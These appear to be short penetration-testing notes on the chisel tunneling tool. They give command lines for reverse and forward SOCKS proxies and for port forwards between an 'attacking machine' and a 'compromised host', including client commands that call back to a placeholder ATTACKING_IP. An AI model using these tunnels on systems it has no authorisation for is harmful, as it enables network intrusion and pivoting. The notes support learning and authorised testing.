chisel

• can use used to set up a tunneled proxy or port forward

• doesn't require ssh

• copy the files from github and extract with gunzip *

• there must be an appropriate copy of the chisel binary on both the attacking machine and compromised server

• Reverse Socks Proxy

  • set up a listener on your chosen port

    • ./chisel serve -p listenport --reverse &

  • on the compromised host do:

    • ./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

• Forward Socks

  • rarer than reverse proxies

  • on the compromised host use:

    • ./chisel server -p LISTEN_PORT --socks5

  • on the attacking box

    • ./chisel client targetip:listen_port proxy_port:socks

• Remote Proxy Forward

  • for when we connect back from a compromised target to create the forward

  • on the attacking machine

    • ./chisel server -p LISTENPORT --reverse &

  • from the compromised serve

    • ./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

• Local Port Forward

  • on the compromised server

    • ./chisel serve -p LISTERN_PORT

  • on the attacking machine

    • ./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT